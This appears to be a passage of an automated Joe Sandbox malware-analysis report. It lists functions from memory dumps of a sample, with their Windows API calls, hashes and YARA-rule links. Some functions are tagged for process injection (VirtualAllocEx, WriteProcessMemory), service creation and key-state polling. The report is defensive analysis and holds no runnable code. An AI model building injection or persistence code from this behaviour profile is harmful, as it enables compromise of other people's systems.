                                                                                  • GetVersion.KERNEL32 ref: 0BE96EA0
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0BE96EDC
                                                                                    • Part of subcall function 0BE93C30: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C52
                                                                                    • Part of subcall function 0BE93C30: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C85
                                                                                    • Part of subcall function 0BE93C30: RegCloseKey.ADVAPI32(?,0BE93CA8,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C9B
                                                                                  • GetThreadLocale.KERNEL32 ref: 0BE96EBC
                                                                                    • Part of subcall function 0BE96D4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0BE96DB2), ref: 0BE96D72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3734044017-0
                                                                                  • Opcode ID: 4bc3b0e318a25f15ac87b1ccbdfc1398bcc1da483c9f511846e6da48d3b550b4
                                                                                  • Instruction ID: 4d629106add76f4158e27f98887a6750597602354db368b141eccf9423c494e3
                                                                                  • Opcode Fuzzy Hash: 4bc3b0e318a25f15ac87b1ccbdfc1398bcc1da483c9f511846e6da48d3b550b4
                                                                                  • Instruction Fuzzy Hash: E2012DA0814347EDEF10FB72F04634C3AE1AB91785F05755AC1229A640E73DC30C9B6B
                                                                                  Function 6A6E6F10 Relevance: 7.6, APIs: 5, Instructions: 57injectionmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualProtectEx.KERNEL32 ref: 6A6E6F44
                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,6A6E6E70,00000030), ref: 6A6E6F5B
                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00000030,?,?), ref: 6A6E6F6E
                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000030,00001000,00000040,00000000,6A6D3421,00000000), ref: 6A6E6F8C
                                                                                  • WriteProcessMemory.KERNEL32 ref: 6A6E6FA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProcessProtectWrite$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 3771146588-0
                                                                                  • Opcode ID: 3db2fcea71859a86ac6997f9045e1e7f0f0dfc798e7f81595a425aa0be85afff
                                                                                  • Instruction ID: f60d6710bc02fc62f2ced4ceaa366d19da7920ba16997cfb98191824b29776e6
                                                                                  • Opcode Fuzzy Hash: 3db2fcea71859a86ac6997f9045e1e7f0f0dfc798e7f81595a425aa0be85afff
                                                                                  • Instruction Fuzzy Hash: 9F01D6B500D3157AE6009A56CC49FF7BBFCEF82A96F404518FB48A10C0DA746D488BB5
                                                                                  Function 6A6F823E Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FA9DA: GetWindowLongA.USER32(?,000000F0), ref: 6A6FA9E5
                                                                                  • GetKeyState.USER32(00000010), ref: 6A6F8264
                                                                                  • GetKeyState.USER32(00000011), ref: 6A6F826D
                                                                                  • GetKeyState.USER32(00000012), ref: 6A6F8276
                                                                                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 6A6F828C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$LongMessageSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1063413437-0
                                                                                  • Opcode ID: 0b2d0e059ae80a3ccda46e4d77646038718ae3e43b4f4ef10a4eb308f6c15532
                                                                                  • Instruction ID: 0c3332e2f9e281dcc65fc440f2218e7c098221d883240a4c4180f8830980baf2
                                                                                  • Opcode Fuzzy Hash: 0b2d0e059ae80a3ccda46e4d77646038718ae3e43b4f4ef10a4eb308f6c15532
                                                                                  • Instruction Fuzzy Hash: CFF02E35351B8B2AFE1426B68C05FE50E575FA1BD4F020CB1AB45EB0E6CE90D80365F4
                                                                                  Function 6A6D3C40 Relevance: 4.6, APIs: 3, Instructions: 56sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D3C5C
                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,6A6D3D05), ref: 6A6D3C75
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D3C7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 4250438611-0
                                                                                  • Opcode ID: 8dbbcdb1ec05e1188633edaefd29bfcf205f28edaaa255efab2b1a36a9b1c979
                                                                                  • Instruction ID: f6046c5079647d9c046ad79077ffc6b250030ba2dc92402fe60c674a1a6d54e5
                                                                                  • Opcode Fuzzy Hash: 8dbbcdb1ec05e1188633edaefd29bfcf205f28edaaa255efab2b1a36a9b1c979
                                                                                  • Instruction Fuzzy Hash: FF1148B08057459BC330BF79C999216FAD4AF42380B09C93DD4D687261EF30E840EB52
                                                                                  Function 6A6F5C1F Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f57626ccbf8a88f8973daa56ffcf315ae7f9b96cbf56d05f644017582010076
                                                                                  • Instruction ID: d177f85916ef8935eff6deb603a50b64f49dd0184b657b139fdb2fdbab700f02
                                                                                  • Opcode Fuzzy Hash: 8f57626ccbf8a88f8973daa56ffcf315ae7f9b96cbf56d05f644017582010076
                                                                                  • Instruction Fuzzy Hash: 9FF01931504249BBDF015FA5CC89EAE3BAEAB12345B05C828FC26E5450DF30CE56DB51
                                                                                  Function 6A6E2640 Relevance: 4.5, APIs: 3, Instructions: 24serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,6A6E26BE), ref: 6A6E2659
                                                                                  • GetLastError.KERNEL32(?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,6A6E26BE), ref: 6A6E2663
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,6A6E26BE), ref: 6A6E2673
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$CloseCreateErrorHandleLast
                                                                                  • String ID:
                                                                                  • API String ID: 2127812319-0
                                                                                  • Opcode ID: 5c7378031ce719524090c7e8b2e47412bf7177a908a88d9d7327c2ec12efb388
                                                                                  • Instruction ID: 198e70bbf45f4f1f077df1d26d448a6fb4c956998ae61ebe6e7e95d02f6a2ec4
                                                                                  • Opcode Fuzzy Hash: 5c7378031ce719524090c7e8b2e47412bf7177a908a88d9d7327c2ec12efb388
                                                                                  • Instruction Fuzzy Hash: D3D09EB82A03017AFE1016628D5BF6A25AEAB51B82F845464B601E94C0D6E94C409D34
                                                                                  Function 6A6DF3B0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x, xrefs: 6A6DF4F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
                                                                                  • API String ID: 2111968516-3431257331
                                                                                  • Opcode ID: 63d40c8554bafffec513a92fe5bfdf807a8ef848c93d1c0a5bf370685db57c8a
                                                                                  • Instruction ID: 7161f412cad1f407f8c2104b2ccc505f0a11db2022c97f0ca198e5e623aeb083
                                                                                  • Opcode Fuzzy Hash: 63d40c8554bafffec513a92fe5bfdf807a8ef848c93d1c0a5bf370685db57c8a
                                                                                  • Instruction Fuzzy Hash: 9531B8B16183115BC308DF2E9C9492F76D6ABC8305F408A2DF889D7395EA34DE14C7E6
                                                                                  Function 0BEB589C Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,0BEB5938), ref: 0BEB58BC
                                                                                  • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0BEB5938), ref: 0BEB58E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: ae727caa2986b5642f00d958e6ba0a09f32bb935d482bb72b079dc3f98646b72
                                                                                  • Instruction ID: cdb2b6b49d62062cac2f9344791672c16f59e064f7159398b0f2482fa189da12
                                                                                  • Opcode Fuzzy Hash: ae727caa2986b5642f00d958e6ba0a09f32bb935d482bb72b079dc3f98646b72
                                                                                  • Instruction Fuzzy Hash: 0701D0703142596FDB21EB64DCA3FDA73ECDB64710F5050B19A54D62C0DAF06E448925
                                                                                  Function 0BE9FB64 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0BE9FBC8), ref: 0BE9FB8A
                                                                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0BE9FBC8), ref: 0BE9FBA3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: e6e24d1605d574e3d29e6418ce35ffec6f6c095a69f7cacc03eec310f608f15f
                                                                                  • Instruction ID: 0623a8a93dcb5efaa6d5148b91c862d95b7683c0745ce833ae8a1e6d6cf5f041
                                                                                  • Opcode Fuzzy Hash: e6e24d1605d574e3d29e6418ce35ffec6f6c095a69f7cacc03eec310f608f15f
                                                                                  • Instruction Fuzzy Hash: 33F09631E14304BFEF10EFE1E852D9EB37EDB85710F40D565A510D7680EA7469088660
                                                                                  Function 6A6E2BD0 Relevance: 2.4, APIs: 1, Instructions: 913COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
